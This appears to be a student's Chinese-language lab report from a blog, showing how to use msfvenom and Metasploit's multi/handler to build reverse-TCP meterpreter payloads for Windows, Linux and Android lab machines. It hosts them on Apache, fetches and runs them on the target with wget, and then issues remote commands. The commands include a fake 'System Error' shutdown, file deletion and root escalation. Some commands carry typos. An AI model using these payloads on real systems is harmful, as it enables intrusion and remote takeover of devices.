远程控制6.4-6.5

最新推荐文章于 2024-05-29 13:49:36 发布
最新推荐文章于 2024-05-29 13:49:36 发布
阅读量1.1k 收藏 20
点赞数 39
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A33479/article/details/137954144
版权

6.4-6.5 如何使用msfvenom生成被控端并进行远程控制

在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)

 

前导练习:
1.查看帮助信息

Msfvenom --help

 

2.查看所有可以使用的攻击模块

Msfvenom -l paylosds

 

3、筛选出使用reverse_tcp的模块

Msfvenom -l paylosds | grep reverse_tcp

 

4.使用--list-options选项查看攻击载荷需要设置的参数。

Msfvenom –list-options -p windows/meterpreter/reverse_tcp

6.4 如何使用msfvenom生成被控端并进行远程控制

6.4.1 生成windows系统下的被控端并进行远程控制

测试windows系统实验使用的网络环境,填写以下IP地址:

测试用windows系统(WinXPenSP)的IP: 192.168.132.131

虚拟机Kali Linux 2的IP: 192.168.132.128

步骤一:生成Windows操作系统下的被控端并放入目标靶机运行

options(选项):

-p   指定要生成的攻击荷载(payload)

-f   输出格式(format)

-o   输出(out)存储payload的位置

方法一(教材): 将被控端payload.exe生成到/var/payload.exe

方法二:将被控端winpayload.exe生成到网站的目录(/var/www/html/)下,然后到靶机中用浏览器下载并运行。
(1).将被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)下

(2).检查apache2服务是否启动:
systemctl status apache2.service

 

(3).启动apache2服务:
systemctl start apache2.service

(4). 到靶机WinXPenSP3中用浏览器下载并运行

 

步骤二 :启动主控端
1、启动metasploit,进入metasploit(msf)的控制台。

2、使用handler模块,然后配置参数。

使用--list formats查看Metasploit所有支持的格式:

(1)use exploit/multi/handler

(2)设置攻击载荷为windows/meterpreter/reverse_tcp

(3)设置lhost为kali的IP

(4)设置lpost为20000

(5)发起攻击(等待目标靶机WinXPenSP3上线)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.132.128

set lport 20000

exploit

是否建立会话?

 

步骤三:控制目标靶机(WinXPenSP3

输入shell,执行各种命令,如查看操作系统信息、磁盘信息、关闭系统等。

1.查看操作系统信息

 

2.查看目标靶机有哪些磁盘

diskpart

 

3.延时关闭系统并弹出提示框

shutdown -s -t 10000 -c "System Error!!!"

4.退出控制

 

6.4.2 生成linux系统下的被控端并进行远程控制

测试linux系统实验使用的网络环境,填写以下IP地址:

测试用linux系统(Metasploitable2-Linux)的IP:192.168.132.130

虚拟机Kali Linux 2的IP:192.168.132.128

步骤一:生成linux操作系统下的被控端并放入目标靶机运行
1、查看linux的攻击载荷
msfvenom -l payloads | grep reverse_tcp

2、生成被控端

(1)将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下,稍后到靶机中用浏览器下载并运行。

msfvenom -p linux/meterpreter/reverse_tcp lhost=192.168.132.128 lport=5001 -f elf -o /var/www/html/linuxpayload.elf

 (2)检查apache2服务是否启动,如果未启动apache2服务,则需要启动。

systemctl start apache2

systemctl status apache2

 

步骤二 :启动主控端
1、启动metasploit,进入metasploit(msf)的控制台。

2.使用handler模块,然后配置参数。

(1)使用handler模块

(2)设置攻击载荷为linux/x86/meterpreter/reverse_tcp

(3)设置lhost为kali的IP

(4)设置lpost为5001

(5)发起攻击(等待目标靶机Metasploitable2-Linux上线)

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.132.128

set lport 5001

exploit

步骤三 :到目标靶机(Metasploitable2-Linux)下载攻击载荷并运行。
1.下载被控端

wget http://192.168.132.128/linuxpayload.elf

2.查看被控端是否给了执行权限,没给则需要添加执行权限

chmod +x linuxpayload.elf

3、运行被控端

返回到kali,是否建立会话?

./linuxpayload.elf

步骤四:控制目标靶机(Metasploitable2-Linux

输入shell,执行各种命令,如查看操作系统信息、磁盘信息、关闭系统等。

1.查看操作系统信息

uname -a

 2.查看主机名

hostname

3.查看IP地址

ip addr

4.使用curl命令访问kali的网页

curl http://192.168.132.128

 5.退出控制

 

6.4.3 生成android系统下的被控端并进行远程控制

测试android系统实验使用的网络环境,填写以下IP地址:

测试用android系统的IP:192.168.132.129

虚拟机Kali Linux 2的IP:192.168.132.128

步骤一:生成android操作系统下的被控端并放入目标靶机运行
1、查看android的攻击载荷(只查看使用reverse_tcp)
msfvenom -l payloads | grep reverse_tcp

2、生成被控端

(1)将被控端androidpayload.apk生成到网站的目录(/var/www/html/)下

msfvenom -p android/metrtpreter/reverse_tcp lhost=192.168.132.128 lport=20000

-o /var/www/html/androidpayload.apk

(2)检查apache2服务是否启动,如果未启动apache2服务,则需要启动。

systemctl start apache2

systemctl status apache2

 

步骤二 :启动主控端
1.启动metasploit,进入metasploit(msf)的控制台。

 2、使用handler模块,然后配置参数。

(1)使用handler模块

(2)设置攻击载荷为android/meterpreter/reverse_tcp

(3)设置lhost为kali的IP

(4)设置lpost为20000

(5)发起攻击(等待目标靶机android-86_64-7.1-r5上线)

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.132.128

set lport 20000

exploit

 

步骤三 :到目标靶机(android-86_64-7.1-r5)下载攻击载荷并运行。
1.下载被控端

2、运行被控端

返回到kali,是否建立了会话?

步骤四:控制目标靶机(android-86_64-7.1-r5

输入shell,执行各种命令,如查看操作系统信息、磁盘信息、关闭系统等。

1.输入:shell

2.查看当前用户名
whoami
3.查看操作系统信息
uname -a

 

 5.尝试切换到root用户

(1)在安卓虚拟机中弹出提示信息,选择“拒绝”。

在kali中可以看到什么结果?

(2)在安卓虚拟机中弹出提示信息,选择“允许”。

在kali中可以看到什么结果?

在kali中输入whoami,显示当前用户

切换为root用户之后,可以对安卓机进行最大权限的控制。

I:显示根目录的文件

ls

II:进入存储卡中的下载目录(sdcard/Download),查看当前目录的文件。

cd sdcard

ls Download

III:删除Download目录中的文件

rm -rf Download/androidpayload.apk

IV:关闭系统

关闭系统之后,主控端无法再继续控制了。

poweroff

3、退出

七、总结

在进行远程控制方面的实验中,我首先学习了如何使用MSFPC和msfvenom这两个工具生成被控端,并通过Metasploit框架进行远程控制。这些工具对于渗透测试和安全评估非常有用,但同时也需要谨慎使用,以避免违反法律和道德规范。

通过实验,我学到了以下几点:

1.Payload生成:使用MSFPC和msfvenom生成适用于不同目标平台的Payload。我了解到Payload可以是各种格式的文件,如可执行文件、脚本等,而生成的Payload可以针对特定的目标系统和架构进行定制。

2.监听器的配置:学习了在Metasploit中配置监听器以侦听被控端的连接。这包括设置监听的地址和端口,以及选择合适的Payload类型。

3.Payload的部署:学习了将生成的Payload发送给目标设备并执行的步骤。这需要一定的社会工程学技巧,以确保目标用户执行Payload。

4.远程控制操作:一旦目标设备执行了Payload并与监听器建立了连接,我学习了如何在Metasploit中进行远程控制操作。这包括执行命令、上传下载文件、截取屏幕等功能。

这次实验让我对远程控制的原理和实践有了更深入的了解。我将继续学习和实践,不断提升自己在网络安全领域的技能,并始终保持合法合规的原则。  

2022级计网一班韦思颖
关注
  • 39
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
TCP-IP详细协议
02-26
6.4 ICMP时间戳请求与应答 53 6.4.1 举例 54 6.4.2 另一种方法 55 6.5 ICMP端口不可达差错 56 6.6 ICMP报文的4.4BSD处理 59 6.7 小结 60 第7章 Ping程序 61 7.1 引言 61 7.2 Ping程序 61 7.2.1 LAN输出 62 7.2.2 WAN...
使用msfvenom远程控制
m0_68638628的博客
06-29 805
msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。⑵再被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下。将被控端winpayload.exe生成到网站的目录(/var/www/html/)下。⑴将被控端payload.exe生成到/var/payload.exe。
Metasploit之Msfvenom实战渗透自己电脑
怡红群芳的博客
04-05 417
Metasploit之Msfvenom实战渗透自己电脑
利用msfvenom制作木马,并且反弹shell
m0_64444909的博客
09-14 4877
msf
Metasploit功能程序------payloads、encoder、Nasm shell
WEL测试
09-05 2689
2.3Metasploit功能程序          Metasploit的功能程序是在某些的特定场合下,对Metasploit框架中的一些特殊功能进行直接访问的接口。 2.3.1 MSF攻击载荷生成器          MSF攻击载荷生成器允许能够生成shellcode、可执行代码和其他更多的东西,也可以让 它们在框架软件之外的渗透代码中进行使用。          Shellcode
【木马生成工具】Msfvenom介绍及利用
Sagittarius32的博客
07-14 4586
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。...
TCP-IP详解卷1
09-23
6.4 ICMP时间戳请求与应答 53 6.4.1 举例 54 6.4.2 另一种方法 55 6.5 ICMP端口不可达差错 56 6.6 ICMP报文的4.4BSD处理 59 6.7 小结 60 第7章 Ping程序 61 7.1 引言 61 7.2 Ping程序 61 7.2.1 LAN输出 62 7.2.2 WAN...
TCP-IP技术大全
12-01
6.5 Internet顶级域 51 6.6 选择一个域名服务器 52 6.7 名字服务解析过程 52 6.7.1 递归查询 52 6.7.2 叠代查询 52 6.8 高速缓存 52 6.9 反向解析(Pointer)查询 52 6.10 DNS安全 52 6.11 资源记录 53 6.12 小结 54 ...
TCP-IP详解试题
05-26
6.4 ICMP时间戳请求与应答 53 6.4.1 举例 54 6.4.2 另一种方法 55 6.5 ICMP端口不可达差错 56 6.6 ICMP报文的4.4BSD处理 59 6.7 小结 60 第7章 Ping程序 61 7.1 引言 61 7.2 Ping程序 61 7.2.1 LAN输出 62 7.2.2 WAN...
解决 msfvenom 相关报错
Blood_Seeker的博客
06-21 2200
使用msfvenom相关命令时出现了各种报错, 尤其在指定 x86/shikata_ga_nai 编码时报错严重, 今天终于 手工解决, 解决办法是升级 kali 下的 ruby 文件, 具体命令也很简单:   apt-get upgrade ruby   apt-get autoremove 由于忘记提前捕捉好错误, 相关错误的截图这里无法给出, 不过关于其他 msfvenom 的问题...
msfvenom的介绍以及基本使用
H_zcn的博客
10-22 959
metasploit是一个非常强大的攻击,它不仅仅是能对windows系统进行攻击,还支持全平台的攻击,例如Linux,macOS,安卓手机等等,在上一篇metasploit框架介绍中我们简单的了解了metasploit里一些基本框架与命令,以及还体验了最基本的攻击流程,接下来我将进一步的介绍metasploit另外的一些功能与使用方法。msfvenom 有病毒,毒液的意思,它有来生成后门的功能。msfvenom是msfpayload(攻击载荷)和msfencode(编码加密)的组合。
msfcli 不能使用,在新版metasploit不再有效,推荐使用msfconsole
yanyi3271的博客
10-28 779
msfcli介绍及使用 msfcli命令行程序是Metaploit框架为脚本自动化处理及与其他命令行工具互操作而设计的一种用户接口,它可以直接从命令行shell执行,并允许你通过linux的管道机制将结果输出重定向给其他程序进行处理 在新版本的metasploit中,msfcli不再支持,推荐使用msfconsole 1、编写攻击脚本,将在msfconsole中的各项设置写入该脚本中 2、执行脚...
华纳云:在一个服务器上如何设置多个IP地址?
YOKEhn的博客
05-27 359
在Windows上,可以通过网络连接的高级TCP/IP设置或使用netsh命令添加多个IP地址。在一个服务器上设置多个IP地址的具体步骤取决于所使用的操作系统(例如Linux或Windows)。你也可以使用ip命令临时配置多个IP地址,这在需要立即生效但不重启网络服务的情况下非常有用。在“IP 设置”标签下,点击“添加”按钮,输入新的IP地址和子网掩码,然后点击“添加”。选择“Internet 协议版本 4 (TCP/IPv4)”,然后点击“属性”。右键点击要配置的网络适配器,选择“属性”。
webserver服务器从零搭建到上线(八)|EpollPoller事件分发器类
糖炒栗子
05-28 879
EPollPoller 类实现了基于 epoll 的 I/O 多路复用,通过监控多个文件描述符上的事件,并在事件发生时通知相应的 Channel 对象来处理事件。通过实现这些函数,EPollPoller 能够高效地管理和分发事件。下一节,我们将讲解EventLoop类的具体实现!
TPM之VMK密封
柳似烟的专栏
05-27 405
同样的,具备TPM芯片的电脑,在系统中存在一个\Device\TPM的设备以及对应的TPM驱动程序,所以,当对系统进行基于TPM芯片的Bitlocker加密时,存在DeviceIOControl的交互,下面通过抓包来窥探这一过程。同样,基于TPM的安全启动链也不做过多解释,简单说就是当电脑通过TPM进行全盘加密后,后期对电脑的改动影响系统启动,PCR校验不通过时,触发输入恢复密钥的“蓝屏”。通过分析保存的json格式的文件,追踪文件句柄,得到TPM加密时的所有与驱动层的交互数据。PCR校验位图解释如下。
Linux chmod 命令
最新发布
2301_78660211的博客
05-29 681
chmod命令是 Linux 系统中非常重要的命令,它可以用于修改文件和目录的访问权限,以及控制用户对系统资源的访问。在这篇博客中,我们深入探讨了chmod命令的使用方法,以及如何使用它来管理文件和目录的访问权限。希望这篇博客能够帮助读者更好地理解和使用 Linux 系统。
Linux系统下安装配置nginx,本地访问服务器nginx
y662225dd的博客
05-29 441
3.本地测试服务器上的nginx,出现以下画面即可表示安装nginx成功了,本地连接也没问题。5.安装成功后,nginx会默认安装在/usr/local/nginx目录下。4.编译安装Nginx。1.进入到nginx目录下的sbin。http://服务器ip:8080。
【技术实操】银河高级服务器操作系统实例分享,达梦数据库服务器 oom 问题分析
银河麒麟操作系统的博客
05-28 612
【技术实操】银河高级服务器操作系统实例分享,达梦数据库服务器 oom 问题分析。
centos-6.4-x86_64-bin-dvd2.iso
09-28
centos-6.4-x86_64-bin-dvd2.iso是CentOS操作系统的一个版本。CentOS是一种基于Linux的开源操作系统,它是以Red Hat Enterprise Linux(RHEL)为基础进行开发的。CentOS完全兼容RHEL,并且提供了稳定、安全的操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值